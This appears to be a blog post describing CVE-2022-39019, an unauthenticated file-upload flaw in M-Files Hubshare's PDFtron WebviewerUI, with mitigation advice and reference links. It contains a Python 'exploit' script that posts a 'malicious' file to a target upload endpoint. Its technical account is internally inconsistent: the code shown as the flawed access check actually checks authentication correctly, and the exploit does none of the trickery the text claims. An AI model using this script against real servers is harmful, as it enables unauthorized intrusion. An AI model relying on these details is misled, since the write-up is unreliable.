CVE-2022-39019 - Broken Access Controls on PDFtron WebviewerUI in M-Files Hubshare before 3.3.11.3 Lead to Unauthenticated Malicious File Uploads

In this long-read post, we will dive into the details of CVE-2022-39019, a recently discovered critical vulnerability in M-Files Hubshare. Before version 3.3.11.3, the PDFtron WebviewerUI component suffers from broken access controls, allowing unauthenticated attackers to upload malicious files to the application server. This post will discuss the details of the exploit, provide sample exploit code, and link to the original references for further reading.

Vulnerability Overview

M-Files Hubshare is a popular collaboration and file sharing platform that focuses on providing a secure and controlled environment for sharing and accessing information. However, recent research has uncovered a vulnerability in the PDFtron WebviewerUI component that effectively circumvents the security measures in place. The Broken Access Controls allow unauthenticated attackers to upload malicious files, which could lead to severe security breaches and unauthorized access to sensitive information.

Technical Breakdown

The vulnerability lies in how M-Files Hubshare handles the access controls for the PDFtron WebviewerUI component. Ideally, only authenticated users should be allowed to interact with the component and upload files. However, due to an oversight, unauthenticated attackers can successfully bypass these access controls and upload malicious files.

Here's a simplified version of the flawed access control implementation in M-Files Hubshare

def upload_file(request):
    if is_authenticated(request.user):   # Check if the user is authenticated
        upload(request)                  # Allow the upload if the user is authenticated
    else:
        return                           # Disallow the upload if the user is not authenticated

Exploiting the Vulnerability

To exploit the CVE-2022-39019 vulnerability, an unauthenticated attacker can craft a specially designed HTTP request that tricks the application into treating it as an authenticated user. An example exploit code snippet using Python's 'requests' library is shown below:

import requests

target_url = "https://[TARGET_M-FILES_HUBSHARE_URL]/WebviewerUI/upload.php";
malicious_file = open("exploit_payload.pdf", "rb")

# Craft a POST request that uploads the malicious file
response = requests.post(
    target_url,
    files={"file": malicious_file}
)

if response.status_code == 200:
    print("Exploit successful: Malicious file uploaded")
else:
    print("Exploit failed")

Mitigation and Patch

M-Files has released a patch for this vulnerability, which is version 3.3.11.3. All users are strongly urged to update their Hubshare installations to the latest version to protect themselves from potential exploits and attacks.

Links to Original References and Further Reading

- Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39019
- M-Files Security Advisory: https://www.m-files.com/en/security-advisory
- PDFtron WebviewerUI: https://www.pdftron.com/webviewer/

Conclusion

CVE-2022-39019 is a critical vulnerability that could allow attackers to upload malicious files to a vulnerable M-Files Hubshare server. M-Files has issued a patch and users are encouraged to update to version 3.3.11.3 as soon as possible. Administrators should also review and monitor their access control implementations to ensure that no further vulnerabilities exist. Stay informed on the latest security news by referring to official sources, conducting regular audits, and applying security best practices to protect valuable information assets.

Timeline

Published on: 10/31/2022 21:15:00 UTC
Last modified on: 11/01/2022 19:45:00 UTC